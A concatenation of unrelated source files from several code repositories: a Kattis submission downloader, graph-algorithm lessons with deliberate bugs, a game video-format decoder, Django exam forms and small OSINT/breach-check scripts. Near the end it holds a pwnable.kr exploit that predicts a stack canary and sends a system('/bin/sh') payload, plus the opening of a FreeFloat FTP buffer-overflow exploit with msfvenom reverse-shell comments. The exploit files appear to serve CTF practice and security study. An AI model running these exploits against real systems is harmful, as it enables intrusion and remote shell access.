return np.sum(np.square(values)) if len(values) > 0 else 0
def iqr_numba(values, index):
return np.percentile(values, 75) - np.percentile(values, 25) if len(values) > 0 else 0
``` |
{
"source": "0xlimE/Kattis-Download-Helper",
"score": 3
} |
#### File: 0xlimE/Kattis-Download-Helper/Kattisdownloader.py
```python
import requests
import zipfile
from io import BytesIO
from bs4 import BeautifulSoup
import os
import shutil
baseurl = "https://open.kattis.com/"
cookies = {'EduSiteCookie': '**INSERT COOKIE HERE****'}
username = "***INSERT USERNAME HERE***"
assignments = set()
def splitRow(row):
cells = row.findChildren('td')
returnlist = []
for cell in cells:
returnlist.append(cell.getText())
return returnlist
def getAcceptedOnSite(url):
get = requests.get(url,cookies=cookies)
soup = BeautifulSoup(get.content, 'html.parser')
table = soup.findChildren('table')
rows = table[1].findChildren(['tr'])
returnlist = []
for row in rows[1:]:
listRow = splitRow(row)
if((listRow[2] not in assignments) and (listRow[3] == "Accepted")):
assignments.add(listRow[2])
returnlist.append(listRow)
return returnlist
def getAllAccepted(username):
toDownload = []
for i in range(5000): #Assume no one has more than 5000 pages
print("indexing page "+str(i))
url = baseurl+"users/"+username+"?page="+str(i)
resultFromPage = getAcceptedOnSite(url)
if(len(resultFromPage) == 0):
return toDownload
toDownload = toDownload + resultFromPage
def downloadContents(id,folder):
try:
os.mkdir(folder)
except FileExistsError:
print("Directory " , folder , " already exists,skipping")
return
url = baseurl+"submissions/"+str(id)+"/source"
request = requests.get(url,cookies=cookies)
zip_file = zipfile.ZipFile(BytesIO(request.content))
for zip_info in zip_file.infolist():
if zip_info.filename[-1] == '/':
continue
zip_info.filename = os.path.basename(zip_info.filename)
zip_file.extract(zip_info,os.getcwd()+"/"+folder)
done = getAllAccepted(username)
for d in done:
print("Downloading "+d[2])
downloadContents(int(d[0]),d[2])
print("Finished!")
``` |
{
"source": "0xLiso/DeepLearningFromScratch",
"score": 4
} |
#### File: python/Lesson01/lesson01.py
```python
from collections import deque
import unittest
"""
Ejemplo de solución para el primer post.
RECORDAD QUE CONTINE ERRORES INTENCIONADOS PARA EVITAR EL C&P
First post solutions,
REMEMBER, IT HAS SOME INTENTIONAL BUGS TO AVOID C&P
"""
class node():
name = ""
def __init__(self, name):
self.name = name
self.parent_nodes = []
self.child_nodes = []
def __str__(self):
return str(self.name)
def add_child(self, j: str):
if j not in self.child_nodes:
self.child_nodes.append(j)
def add_parent(self, j: str):
if j not in self.parent_nodes:
self.parent_nodes.append(j)
def has_child(self, j: str):
return j in self.child_nodes
def remove_child(self, j: str):
self.child_nodes.remove(j)
def remove_parent(self, j: str):
self.parent_nodes.remove(j)
class graph():
nodes = {}
def __init__(self):
self.nodes = {}
def __exist_node__(self, i: str):
if i not in self.nodes:
raise ValueError(f"node {i} don't exist.")
def add_node(self, node_i: node):
if str(node_i) not in self.nodes:
self.nodes[str(node_i)] = node_i
def add_edge(self, i: str, j: str):
self.__exist_node__(i)
self.__exist_node__(j)
self.nodes[i].add_child(j)
self.nodes[j].add_parent(i)
def remove_edge(self, i: str, j: str):
self.__exist_node__(i)
self.__exist_node__(j)
self.nodes[i].remove_child(j)
self.nodes[j].remove_parent(i)
def has_edge(self, i: str, j: str):
self.__exist_node__(i)
self.__exist_node__(j)
return self.nodes[i].has_child(j)
def out_edges(self, i: str):
return self.nodes[i].child_nodes
def in_edges(self, i: str):
return self.nodes[i].child_nodes
def to_dot(self):
base = "digraph G {"
sout = base + "\n"
for n in self.nodes:
for c in self.nodes[n].child_nodes:
sout = n + "->" + c + "\n"
sout += "}"
return sout
def dfs(self, i: str):
# DFS en pseudo-código
S = [] # recordar que es un contenedor LIFO
visited = []
S.append(i) # Insertamos el nodo inicial en el stack
while len(S) > 0:
v = S.pop()
visited.append(self.nodes[v])
for w in self.nodes[v].child_nodes:
if w not in visited:
S.append(w)
return visited # devolvemos la lista de los nodos en el orden "profundo" correcto
def bfs(self, i: str):
# DFS en pseudo-código
Q = deque([]) # recordar que es un contenedor LILO
visited = []
Q.append(i) # Insertamos el nodo inicial en el Queue
while len(Q) > 0:
v = Q.popleft()
visited.append(self.nodes[v])
for w in self.nodes[v].child_nodes:
if w not in visited:
Q.append(w)
return visited # devolvemos la lista de los nodos en el orden "profundo" correcto
def reverse_bfs(self, i: str):
raise NotImplementedError
def is_DAG(self):
# DFS en pseudo-código
for i in self.nodes:
S = [] # recordar que es un contenedor LIFO
visited = []
S.append(i) # Insertamos el nodo inicial en el stack
while len(S) > 0:
v = S.pop()
if v in visited:
return False
visited.append(v)
for w in self.nodes[v].parent_nodes:
if w not in visited:
S.append(w)
return True # devolvemos la lista de los nodos en el orden "profundo" correcto
class TestGraphMethods(unittest.TestCase):
def setup(self):
g = graph()
g.add_node(node("node_a"))
g.add_node(node("node_b"))
g.add_node(node("node_c"))
g.add_node(node("node_d"))
g.add_node(node("node_e"))
g.add_node(node("node_f"))
return g
def test_to_dot(self):
g = graph()
g.add_node(node("node_a"))
g.add_node(node("node_b"))
g.add_node(node("node_c"))
g.add_node(node("node_d"))
g.add_node(node("node_e"))
g.add_node(node("node_f"))
g.add_edge("node_a", "node_c")
g.add_edge("node_b", "node_d")
g.add_edge("node_c", "node_d")
g.add_edge("node_d", "node_f")
g.add_edge("node_e", "node_f")
result = '''digraph G {
node_a -> node_c
node_b -> node_d
node_c -> node_d
node_d -> node_f
node_e -> node_f
}'''
self.assertTrue(
g.to_dot().replace(' ', '').replace('\t', '').replace('\n', '') ==
result.replace(' ', '').replace('\t', '').replace('\n', ''))
def test_has_edge(self):
# Test manipulación de grafo en pseudo-código
g = self.setup()
g.add_edge("node_a", "node_c")
g.add_edge("node_b", "node_d")
g.add_edge("node_c", "node_d")
g.add_edge("node_d", "node_f")
g.add_edge("node_e", "node_f")
# Test función has_edge
self.assertFalse(g.has_edge("node_a", "node_b"))
self.assertTrue(g.has_edge("node_b", "node_d"))
# Test remove edge
g.remove_edge("node_b", "node_d")
self.assertFalse(g.has_edge("node_b", "node_d"))
def test_dfs(self):
# Test manipulación de grafo en pseudo-código
g = self.setup()
g.add_node(node("node_f"))
g.add_node(node("node_g"))
g.add_node(node("node_h"))
g.add_node(node("node_i"))
g.add_node(node("node_j"))
# el orden de los vertices importa para que la solución sea igual,
# si se hacen los vertices en otro orden, el resultado será distinto pero igualmente correcto.
g.add_edge("node_j", "node_h")
g.add_edge("node_i", "node_h")
g.add_edge("node_h", "node_a")
g.add_edge("node_g", "node_a")
g.add_edge("node_f", "node_b")
g.add_edge("node_e", "node_c")
g.add_edge("node_d", "node_c")
g.add_edge("node_c", "node_b")
g.add_edge("node_b", "node_a")
# Test DFS
resultado = g.dfs("node_a")
self.assertTrue(resultado == [g.nodes["node_a"], g.nodes["node_b"], g.nodes["node_c"], g.nodes["node_d"],
g.nodes["node_e"], g.nodes["node_f"], g.nodes["node_g"], g.nodes["node_h"],
g.nodes["node_i"], g.nodes["node_j"]])
def test_bfs(self):
# Test manipulación de grafo en pseudo-código
g = self.setup()
g.add_node(node("node_f"))
g.add_node(node("node_g"))
g.add_node(node("node_h"))
g.add_node(node("node_i"))
g.add_node(node("node_j"))
g.add_edge("node_d", "node_c")
g.add_edge("node_e", "node_c")
g.add_edge("node_c", "node_b")
g.add_edge("node_b", "node_a")
g.add_edge("node_g", "node_a")
g.add_edge("node_h", "node_a")
g.add_edge("node_f", "node_b")
g.add_edge("node_i", "node_h")
g.add_edge("node_j", "node_h")
# Test DFS
resultado = g.bfs("node_a")
self.assertTrue([str(x) for x in resultado] == ["node_a", "node_b", "node_g", "node_h",
"node_c", "node_f", "node_i", "node_j",
"node_d", "node_e"])
def test_reverse_bfs(self):
# Test manipulación de grafo en pseudo-código
g = self.setup()
g.add_node(node("node_f"))
g.add_node(node("node_g"))
g.add_node(node("node_h"))
g.add_node(node("node_i"))
g.add_node(node("node_j"))
g.add_edge("node_d", "node_c")
g.add_edge("node_e", "node_c")
g.add_edge("node_c", "node_b")
g.add_edge("node_b", "node_a")
g.add_edge("node_g", "node_a")
g.add_edge("node_h", "node_a")
g.add_edge("node_f", "node_b")
g.add_edge("node_i", "node_h")
g.add_edge("node_j", "node_h")
# Test DFS
resultado = g.reverse_bfs("node_a")
self.assertTrue([str(x) for x in resultado] == ["node_e", "node_d", "node_j", "node_i",
"node_f", "node_c", "node_h", "node_g",
"node_b", "node_a"])
def test_is_dag(self):
# Test manipulación de grafo en pseudo-código
g = self.setup()
g.add_node(node("node_f"))
g.add_node(node("node_g"))
g.add_node(node("node_h"))
g.add_node(node("node_i"))
g.add_node(node("node_j"))
g.add_edge("node_d", "node_c")
g.add_edge("node_e", "node_c")
g.add_edge("node_c", "node_b")
g.add_edge("node_b", "node_a")
g.add_edge("node_g", "node_a")
g.add_edge("node_h", "node_a")
g.add_edge("node_f", "node_b")
g.add_edge("node_i", "node_h")
g.add_edge("node_j", "node_h")
# Test is DAG
self.assertTrue(g.is_DAG())
g2 = graph()
g2.add_node(node("node_1"))
g2.add_node(node("node_2"))
g2.add_node(node("node_3"))
g2.add_edge("node_1", "node_3")
g2.add_edge("node_2", "node_3")
g2.add_edge("node_3", "node_2")
# Test BFS
self.assertFalse(g2.is_DAG())
if __name__ == '__main__':
unittest.main()
```
#### File: python/Lesson04/compgraph.py
```python
from graph import Graph,Node
#import all operations
from tensor import Tensor
from variable import Variable
from placeholder import Placeholder
from operations import *
class Compgraph(object):
name = "unnamed"
graph = None
nvariables = 0
nplaceholders = 0
nops = 0
def __init__(self,name:str="anonymous"):
self.name = name
if not self.graph:
self.graph=Graph()
def to_dot(self):
return self.graph.to_dot()
def add_operation(self,op:Operation):
if not op.name:
op.set_name("{}_{}".format(op.base_name,self.nops))
self.graph.add_node(op)
self.nops+=1
for input in op.inputs :
self.graph.add_edge(input,op)
return op
def add_placeholder(self,ph:Placeholder) -> Placeholder:
if not ph.name:
ph.set_name("Placeholder_{}".format(self.nplaceholders))
self.graph.add_node(ph)
self.nplaceholders += 1
return ph
def add_variable(self,v:Variable) -> Variable:
if not v.name:
v.set_name("Variable_{}".format(self.nvariables))
self.graph.add_node(v)
self.nvariables += 1
return v
def run(self,toNode:Node) -> Tensor:
order = self.graph.reverse_bfs(toNode)
for node in order:
node.forward()
return toNode.output
``` |
{
"source": "0xLiso/dePIXELator",
"score": 3
} |
#### File: 0xLiso/dePIXELator/export_film.py
```python
import os
import struct
import subprocess
from copy import copy
import numpy as np
import matplotlib.pyplot as plt
from tqdm import tqdm
class Chunk:
__header_size = 8
header = None
data_position = -1
fd = None
def __init__(self, file):
initial_pos = file.tell()
self.header = file.read(self.__header_size)
if not self.header:
raise EOFError("EOF reached")
if self.header[6] != 0x60 or self.header[7] != 0xC0:
file.seek(initial_pos, 0)
raise LookupError("Chunk Header should end with 0x60c0")
self.data_size = (self.header[1] * 256) + self.header[0]
self.nframe = self.header[5] * 0xFF + self.header[4]
self.type = self.header[3]
self.data_position = file.tell()
file.seek(self.data_size, 1)
self.fd = file
def get_data(self):
initial_pos = self.fd.tell()
self.fd.seek(self.data_position, 0)
result = self.fd.read(self.data_size)
self.fd.seek(initial_pos, 0)
return result
def get_type(self):
for i, b in enumerate(self.header):
if i == 3:
if b == 0:
return "💣" # ¿Es un clear?
elif b == 2:
return "🎨" # Paleta
elif b == 3:
return "🖼️" # Keyframe
elif b == 4:
return "🗝️" # Frame diferencias tipo 1
elif b == 5:
return "🎬" # Frame diferencias tipo 2
elif b == 6:
return "🎞️" # ¿Frame diferencias tipo 3?
elif b == 7:
return "🎵" # Audio
elif b == 9:
return "🏂" # ¿Esto es un salto?
elif b == 11:
return "📼" # ¿Frame diferencias tipo 4?
elif b == 12:
return "❓" # Ni idea, no parece video
elif b == 13:
return "❗" # Ni idea, no parece video
elif b == 14:
return "💲" # Ni idea, no parece video
return "💩"
class VIPFile:
fd = None
filename = ""
chunks = []
initial_offset = 0x20
def __init__(self, filename, initial_offset=0x20, max_chunks=-1):
self.filename = filename
self.fd = open(filename, "rb")
self.initial_offset = initial_offset
self.max_chunks = max_chunks
self.video_height = 0x8C
self.video_width = 0xE4
self.analyze_vip_file()
self.frame = [0] * self.video_width * self.video_height
self.masks = (
(0, 0, 0, 0),
(1, 0, 0, 0),
(0, 1, 0, 0),
(1, 1, 0, 0),
(0, 0, 1, 0),
(1, 0, 1, 0),
(0, 1, 1, 0),
(1, 1, 1, 0),
(0, 0, 0, 1),
(1, 0, 0, 1),
(0, 1, 0, 1),
(1, 1, 0, 1),
(0, 0, 1, 1),
(1, 0, 1, 1),
(0, 1, 1, 1),
(1, 1, 1, 1),
)
def __del__(self):
if self.fd:
self.fd.close()
def analyze_vip_file(self):
self.fd.seek(self.initial_offset, 0)
while True:
try:
tmp_chunk = Chunk(self.fd)
self.chunks.append(tmp_chunk)
if 0 < self.max_chunks < len(self.chunks):
break
except EOFError as e:
print(f"EOF with {len(self.chunks)}")
break
except Exception as e:
print(e)
raise e
def get_chunk(self, chunk_id):
return list(self.chunks[chunk_id].get_data())
def show_info(self, init=0, end=-1, filter_by=[]):
if end < 0:
end = len(self.chunks)
for count, bh in enumerate(self.chunks[init:end]):
h = bh.header
endset = "💩💩💩💩💩💩💩💩💩💩💩"
size = bh.data_size
text = ""
endset = bh.get_type()
for i, b in enumerate(h):
text += f"{b:02x} "
if endset in filter_by or len(filter_by) == 0:
print(f"{count + init:06}: [{size:>6}]", end=" ")
print(f"{text} {endset}", end=" ")
if endset == "📼":
r = self.get_chunk(count + init)
print(f" ->{r[0]}", end=" ")
print("")
def show_info_acc(self, init=0, end=-1, filter_by=[]):
res = []
if end < 0:
end = len(self.chunks)
for count, bh in enumerate(self.chunks[init:end]):
h = bh.header
for i, b in enumerate(h):
if i == 3:
if b == 5:
res.append(count + init)
return res
def draw_palette(self, id):
palette = self.get_palette(id)
colors = [x for x in range(len(palette))]
while len(colors) < 256:
colors.append(0)
palette_matrix = np.array(palette, dtype="uint8")
indices = np.array(colors)
plt.imshow(palette_matrix[indices].reshape((16, 16, 3)))
def get_palette(self, palette_id):
raw = self.get_chunk(palette_id)
palette = [(0, 0, 0)]
i = 2
while True:
try:
r, g, b = raw[i : i + 3] # leemos RGB
i += 3
palette.append((r * 4, g * 4, b * 4))
except Exception as e:
break
return palette
def go_to_line(self, byte_list, initial_position=0xC8A):
"""Se supone que son 4 bytes.
en el ejemplo viene como 0x00040044 y nos da un
salto a: 0x618a
Nos llegaran como 44 00 04 00 hay que pasarlo a LSB 0x00040044"""
ax = struct.unpack("<H", bytearray(byte_list))
return initial_position + ax[0] * 228
# %%
def draw_frame_type03(self, frame_id):
""" Los frames de tipo 3 tienen todos 31920 pixeles, asi que se pintan y ya esta """
res = []
kdata = self.get_chunk(frame_id)
for color in kdata:
res += [color]
return res
def draw_frame_type0b(self, frame_id, last_frameb):
kdata = self.get_chunk(frame_id)
last_frame = list(last_frameb)
pos = 0
vga_pos = 0
if kdata[pos] == 0:
pos += 1
while pos < len(kdata):
colors = kdata[pos : pos + 2]
pos += 2
mask = kdata[pos]
pos += 1
color = [colors[i] for i in self.masks[mask & 0x0F]]
color2 = [colors[i] for i in self.masks[(mask & 0xF0) >> 4]]
last_frame[vga_pos : vga_pos + 4] = color
last_frame[vga_pos + 228 : vga_pos + 228 + 4] = color2
vga_pos += 4
if vga_pos % 228 == 0:
vga_pos += 228
else:
data_pos = 0x1F3 + 1
bitmap_pos = 1
vga_pos = 0
nbits = 0
while bitmap_pos < 0x1F3 + 1:
current_bitmap = kdata[bitmap_pos]
bitmap_pos += 1
# print(hex(current_bitmap))
for bit in format(current_bitmap, "#010b")[2:]:
if bit == "1":
nbits += 1
colors = kdata[data_pos : data_pos + 2]
data_pos += 2
mask = kdata[data_pos]
data_pos += 1
color = [colors[i] for i in self.masks[mask & 0x0F]]
color2 = [
colors[i] for i in self.masks[(mask & 0xF0) >> 4]
]
last_frame[vga_pos : vga_pos + 4] = color
last_frame[vga_pos + 228 : vga_pos + 228 + 4] = color2
vga_pos += 4
if vga_pos % 228 == 0:
vga_pos += 228
# print(hex(data_pos))
# print(nbits)
return last_frame
def draw_frame_type04(self, frame_id, frame):
last_frame = frame
kdata = self.get_chunk(frame_id)
next_line = 0xE4
current_line = 0
pos = 0
draw_address = 0
while pos < len(kdata):
draw_type = kdata[pos]
pos += 1
repetitions = draw_type & 0x7F
repetitions += 1
# print(f'\t\tS:{desp_linea} T:{cuantas_veces}')
if draw_type < 0x80:
for _ in range(repetitions):
color = kdata[pos]
pos += 1
# print(f'\t\t\tPA:{hex(color)}')
last_frame[draw_address] = color
draw_address += 1
else:
#MSB == 1 o que es >=0x80
color = kdata[pos]
pos += 1
# print(f'\t\t\tP:{hex(color)}')
for _ in range(repetitions):
last_frame[draw_address] = color
draw_address += 1
return last_frame # 31920
def draw_frame_type05(self, diff_id, last_frame):
next_line = 0xE4
try:
kdata = list(self.chunks[diff_id].get_data())
# nos saltamos los 2 primeros bytes
pos = 2
num_parts = kdata[pos]
pos += 2
current_line = 0
while num_parts != 0:
current_line += self.go_to_line(
kdata[pos : pos + 2], 0
) # desplazamiento inicial
pos += 2
num_lines = kdata[pos]
# print(f'L:{num_lineas}')
pos += 2
while num_lines != 0:
num_commands = kdata[pos]
# print(f'\tC:{num_commands}')
pos += 1
draw_address = current_line
while num_commands != 0:
draw_address += kdata[pos]
pos += 1
draw_type = kdata[pos]
pos += 1
repetitions = draw_type & 0x7F
repetitions += 1
# print(f'\t\tS:{desp_linea} T:{cuantas_veces}')
if draw_type < 0x80:
for _ in range(repetitions):
color = kdata[pos]
pos += 1
# print(f'\t\t\tPA:{hex(color)}')
last_frame[draw_address] = color
draw_address += 1
else:
color = kdata[pos]
pos += 1
# print(f'\t\t\tP:{hex(color)}')
for _ in range(repetitions):
last_frame[draw_address] = color
draw_address += 1
num_commands -= 1
num_lines -= 1
current_line += next_line
num_parts -= 1
except Exception as e:
print(f"Exception!!!!!! en frame id: {diff_id}")
return last_frame
def apply_palette(self, palette, img):
try:
pal = np.array(palette, dtype="uint8")
indices = np.array(img, dtype="uint8")
return pal[indices].reshape((self.video_height, self.video_width, 3))
except Exception as e:
print(f"Error {e}")
def __iter__(self):
self.iter_index = 0
self.current_palette = None
self.frame = [0 for x in range(self.video_width * self.video_height)]
return self
def __next__(self):
if self.iter_index <= self.max_chunks:
chunk = self.chunks[self.iter_index]
chunk_type = chunk.get_type()
while chunk_type in ["🎵", "🎨"]:
if chunk_type == "🎨":
self.current_palette = self.get_palette(self.iter_index)
self.iter_index += 1
if self.iter_index >= len(self.chunks):
raise StopIteration
chunk = self.chunks[self.iter_index]
chunk_type = chunk.get_type()
if chunk_type == "💣": # 0x00
self.frame=[1]*228*140
pass
elif chunk_type in ["🖼️"]: # 0x03
self.frame = self.draw_frame_type03(self.iter_index)
elif chunk_type in ["🗝️"]: # 0x04
self.frame = self.draw_frame_type04(self.iter_index, self.frame)
elif chunk_type == "🎬": # 0x05
self.frame = self.draw_frame_type05(self.iter_index, self.frame)
elif chunk_type == "🎞️": # 0x06
print(f"tipo 0x06 -> {self.iter_index}")
self.frame = [0] * self.video_width * self.video_height
elif chunk_type == "🏂": # 0x09
print(f"tipo 0x09 -> {self.iter_index}")
pass # Esto se supone que es salto y no hace nada
elif chunk_type == "📼": # 0x11
self.frame = self.draw_frame_type0b(self.iter_index, self.frame)
elif chunk_type == "❓": # 0x12
print(f"tipo 0x12 -> {self.iter_index}")
pass # No se que es pero no creo que sea video
elif chunk_type == "❗": # 0x13
print(f"tipo 0x13 -> {self.iter_index}")
pass # No se que es pero no creo que sea video
elif chunk_type == "💲": # 0x14
#print(f"tipo 0x14 -> {self.iter_index}")
pass # espera N frames que son para solo audio.
#ToDo: hacer que devuelva N frames distintos.
if self.frame is None:
raise Exception(f"tipo {chunk_type}, {self.iter_index}")
self.iter_index += 1
if chunk_type in ["🎞️"]: # Nos faltan 2 tipos de frame
dirty_pal = [(255, 0, 0), (0, 255, 0), (0, 0, 255), (255, 0, 255)]
return self.apply_palette(dirty_pal, self.frame), self.iter_index
return self.apply_palette(self.current_palette, self.frame), self.iter_index
else:
raise StopIteration
def __getitem__(self, item):
items = []
if isinstance(item, int):
start, stop = item, item + 1
else:
start = item.start if item.start is not None else 0
stop = item.stop if item.stop is not None else len(self.chunks)
for i, frame in enumerate(self):
if i == stop:
break
if i >= start:
items.append(frame)
return items
if __name__ == "__main__":
# v = VIPFile("/home/liso/notebooks/DL/Zorton/data/game/iso/SN00002.VIP", 0x0DF5B6A0, 10000)
v = VIPFile("./SN00002.VIP", 0x20, 100000)
i = 0
for frame,nframe in tqdm(v):
plt.imsave(f"frames/frame{nframe:08}.png", frame)
i+=1
os.chdir("frames")
"""subprocess.call(
[
"ffmpeg",
"-i",
"frame%d.png",
"-r",
"25",
"-c:v",
"libx264",
"video.mp4",
]
)"""
``` |
{
"source": "0xlomrlo/Examination-Control-Committee",
"score": 2
} |
#### File: main_app/forms/hod.py
```python
from django import forms
from main_app.models import User, Instructor, Dept
from main_app.choices import *
class AddAccountForm(forms.Form):
def __init__(self, *args, **kwargs):
req_user_dcode = kwargs.pop('req_user_dcode', None)
super(AddAccountForm, self).__init__(*args, **kwargs)
self.fields['instructor'].queryset = Instructor.objects.filter(
user__isnull=True).filter(Dcode=req_user_dcode)
instructor = forms.ModelChoiceField(queryset=None)
password = forms.CharField(widget=forms.PasswordInput())
class AddMemberForm(forms.Form):
def __init__(self, *args, **kwargs):
req_user_dcode = kwargs.pop('req_user_dcode', None)
check_hod_query = Dept.objects.values('Ins_ID').exclude(Ins_ID=None)
super(AddMemberForm, self).__init__(*args, **kwargs)
self.fields['account'].queryset = Instructor.objects.filter(
user__isnull=False, user__is_member=False).filter(Dcode=req_user_dcode).exclude(Ins_ID__in=check_hod_query)
account = forms.ModelChoiceField(queryset=None)
class EditPermissionForm(forms.Form):
permission = forms.ChoiceField(choices=PERMISSION_FORM_CHOICES,)
```
#### File: main_app/forms/member.py
```python
from django import forms
from main_app.models import User, Instructor, Control, Exam
from django.utils.crypto import get_random_string
from main_app.choices import *
import datetime
class DailyReportForm(forms.Form):
today = datetime.date.today()
Notes = forms.CharField(
label="Notes", widget=forms.Textarea, required=False)
Absents = forms.ModelMultipleChoiceField(label="Absents", queryset=Instructor.objects.filter(
control__E_ID__Date__year=today.year, control__E_ID__Date__month=today.month, control__E_ID__Date__day=today.day).distinct(), widget=forms.CheckboxSelectMultiple, required=False)
AbsentsNotes = forms.CharField(
label="Notes about absents", widget=forms.Textarea, required=False)
class InvigilatorSchedulesForm(forms.Form):
Ins_ID = forms.IntegerField(label='Employee ID', min_value=0)
class InvigilatorSwitchFirstForm(forms.Form):
First_Ins_ID = forms.IntegerField(label='First Employee ID', min_value=0)
Second_Ins_ID = forms.IntegerField(label='Second Employee ID', min_value=0)
class InvigilatorSwitchSecondForm(forms.Form):
@staticmethod
def label_from_instance(obj):
course_instance = Exam.objects.values_list(
'section__CCourse__CoName', flat=True).filter(pk=obj.E_ID.pk).first()
date_instance = Exam.objects.values_list(
'Date', flat=True).filter(pk=obj.E_ID.pk).first()
rt = f'{course_instance} - ({date_instance})'
return "%s" % rt
def __init__(self, *args, **kwargs):
a = kwargs.pop('first_ins_id', None)
b = kwargs.pop('second_ins_id', None)
super(InvigilatorSwitchSecondForm, self).__init__(*args, **kwargs)
first_ins_query = Control.objects.filter(Ins_ID=a, Role='invigilator')
second_ins_query = Control.objects.filter(Ins_ID=b, Role='invigilator')
self.fields['First_Ins'].queryset = first_ins_query.exclude(
E_ID__control__in=second_ins_query)
self.fields['Second_Ins'].queryset = second_ins_query.exclude(
E_ID__control__in=first_ins_query)
self.fields['First_Ins'].label = f'Choose exam to switch for ({Instructor.objects.get(Ins_ID=a)})'
self.fields['Second_Ins'].label = f'Choose exam to switch for ({Instructor.objects.get(Ins_ID=b)})'
self.fields['First_Ins'].label_from_instance = self.label_from_instance
self.fields['Second_Ins'].label_from_instance = self.label_from_instance
First_Ins = forms.ModelMultipleChoiceField(queryset=None)
Second_Ins = forms.ModelMultipleChoiceField(queryset=None)
``` |
{
"source": "0xmachos/OSINT",
"score": 3
} |
#### File: OSINT/Infrastructure/check_live.py
```python
import argparse
import signal
import requests
def ctrl_c(sig, frame):
print("\n{} chose to quit via CTRL+C!".format(os.environ['USER']))
sys.exit(0)
def parse_file(filepath):
domains = []
with open(filepath) as fp:
line = fp.readline()
while line:
domains.append(line.strip())
line = fp.readline()
return domains
def check_live(domains):
count = 0
for domain in domains:
try:
if "*" in domain:
continue
if requests.get("https://{}".format(domain)).status_code == 200:
print("{}".format(domain))
count += 1
except Exception:
continue
if count == 0:
print("None")
def main():
parser = argparse.ArgumentParser(description="Check if domain is live (HTTP 200)")
parser.add_argument("-f", "--file", action='store', dest='filepath', required=True,
help="File containing domains to check")
args = parser.parse_args()
signal.signal(signal.SIGINT, ctrl_c)
domains_to_check = parse_file(args.filepath)
check_live(domains_to_check)
exit(0)
if __name__== "__main__":
main()
``` |
{
"source": "0xmachos/python-scripts",
"score": 3
} |
#### File: 0xmachos/python-scripts/haveibeenpwnd.py
```python
import sys
import requests
import json
import hashlib
def usage():
print("Check if your email or password has been involved in a breach indexed by haveibeenpwned.com")
print("Usage:")
print(" ./haveibeenpwned <EMAIL>")
print(" ./haveibeenpwned <PASSWORD>")
exit(1)
def check_pwned(email):
url = "https://haveibeenpwned.com/api/v2/breachedaccount/{}".format(email)
req = requests.get(url)
if req.status_code == 200:
return req.content.decode('utf-8')
elif req.status_code == 404:
print("You've not been pwned!")
exit(0)
elif req.status_code == 403:
print("Request Blocked ¯\\_(ツ)_/¯" )
exit(1)
else:
print("Unknown Error")
return 1
def sort_pwned_info(pwned_data):
pwned_json = json.loads(pwned_data)
if len(pwned_json) > 1:
print("You've been pwned {} times!".format(len(pwned_json)))
else:
print("You've been pwned {} time!".format(len(pwned_json)))
for breach in pwned_json:
print(" {} : {}".format(breach['Title'], breach['BreachDate']))
def check_password(password):
password_sha1 = hashlib.sha1(password.encode('utf-8')).hexdigest()
hash_prefix = password_sha1[:5]
local_hash_suffix = password_sha1[5:]
remote_hash_suffixes = []
url = "https://api.pwnedpasswords.com/range/{}".format(hash_prefix)
req = requests.get(url)
for password in req.content.decode('utf-8').strip().split():
remote_hash_suffixes.append(password.split(':', 1)[0])
for remote_suffix in remote_hash_suffixes:
if local_hash_suffix.upper() == remote_suffix:
return(0)
return(1)
def main():
args = sys.argv[1:]
if len(args) == 0:
usage()
input = sys.argv[1]
if '@' in input:
pwned_data = check_pwned(input)
if pwned_data:
sort_pwned_info(pwned_data)
else:
if check_password(input):
print("This password has been pwned!")
else:
print("This password has not been pwned!")
exit(0)
if __name__== "__main__":
main()
``` |
{
"source": "0xmanjoos/hackerman_hackertime",
"score": 2
} |
#### File: 006/md5/test.py
```python
from pwn import *
from ctypes import CDLL
import base64
# context.log_level = 'debug'
libc = CDLL("libc.so.6")
def calc_canary(timestamp, captcha):
libc.srand(timestamp)
rands = []
for i in range(8):
rands.append(libc.rand())
res = rands[1] + rands[5] # Correspond to the reverse code
res += rands[2] - rands[3]
res += rands[7]
res += rands[4] - rands[6]
canary = captcha - res
if(canary<0):
# negate used to change negative num to unsigned int value
canary = util.fiddling.negate(-canary)
return canary
# We first access to server through a ssh connection(any previous level provided account)
# I use the fix level's account :)
conn = ssh('fix', 'pwnable.kr', port=2222, password='<PASSWORD>')
# Call `date +%s` to get timestamp
get_time = conn.process('date +%s', shell=True)
# At the same time, execute the hash binary, in order to let them use the same timestamp
p = conn.connect_remote('127.0.0.1', 9002)
timestamp = int(get_time.recvline().strip('\n'))
get_time.close()
p.recvline() # remove the useless response
captcha = int(p.recvline().split(':')[1].strip(' '))
log.debug('The captcha is %d' % captcha)
canary = calc_canary(timestamp, captcha)
log.info('Calculate canary: %d(%s)' % (canary, hex(canary)))
if canary % 256 != 0:
log.warning("Well, maybe it is not the right canary, let's try again")
log.info("Recalculating canary...")
for i in [1, -1, 2, -2, 3, -3]:
log.info("Calculating canary with timestamp(%d)..." % (timestamp+i))
canary = calc_canary(timestamp+i, captcha)
if canary % 256 == 0:
log.success('Now we are talking, the true canary is %d(%s)' % (canary, hex(canary)))
break
log.warning("Nop! Canary is not %d(%s)" % (canary, hex(canary)))
log.info('Start generating payload...')
# Great! We know the canary's value, now start generate the payload
# This need base64 encode
system_addr = p32(0x08049187)
bin_sh_addr = p32(0x0804B3AC) # We input the "/bin/sh" string and calculate its position
payload = 'A'* 512 # padding to fill the blank
payload += p32(canary) # Put the canary to where it needed to be, pretend the program is running normally
payload += 'B'*12 # padding again
payload += system_addr
payload += bin_sh_addr
payload = base64.b64encode(payload) # We need to encode payload before we input binsh string
payload += '/bin/sh\x00' # It good to know that binsh string is valid base64 string
log.info('Uploading payload...')
log.info(str(canary))
p.sendline(str(captcha))
p.sendline(payload)
p.recvuntil('MD5(data) :', timeout=2) # Filter all useless output to make screen clean
p.recvline(timeout=2)
log.info('Get shell! Enjoy :)')
p.interactive()
```
#### File: hackerman_hackertime/freefloat_ftp/exploit.py
```python
import socket, sys, time, binascii, struct
from pwn import cyclic, cyclic_find, unhex
from etc import payloads
"""
NOTE: i do not take credit for discovering this bug (obviously)
Tested on: windows xp, windows 7
Author: Manjoos
note:
i may attempt to write a version that bypasses windows 10 stack protections
when i have the suffiecient hardware to run a windows 10 vm that is
"""
# change me plz
host = "192.168.1.144"
port = 21
calc = True
p32 = lambda x: struct.pack("I", x)
offset = 250
# 0x77def049
ret = p32(0x77def049)
if calc:
buf = payloads.setbufcalc()
else:
buf = payloads.setbufshell()
# msfvenom -p windows/exec CMD=calc -f py -b "\x00\x0a\x0d"
# msfvenom -p windows/shell/reverse_tcp -b "\x00\x0a\x0d" -f py lhost=127.0.0.1 lport=4444
